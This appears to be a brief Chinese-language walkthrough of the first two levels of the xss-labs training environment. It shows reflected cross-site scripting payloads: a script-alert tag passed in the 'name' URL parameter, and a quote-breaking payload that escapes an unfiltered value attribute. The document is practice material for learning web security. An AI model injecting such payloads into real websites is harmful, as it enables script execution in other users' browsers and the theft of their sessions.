level 1

image-20240813133703721

看到参数为name,构造payload:

1
http://xss-labs-master/level1.php?name=<script>alert('1')</script>

image-20240813134220895

通过

level 2

image-20240813134322969

先提交一个测试代码查看,构造payload:

1
<script>alert('1')</script>

查看源代码

image-20240813134510684

发现下面value没有过滤

构造payload,闭合前后

1
">"<script>alert('1')</script><"

image-20240813135805252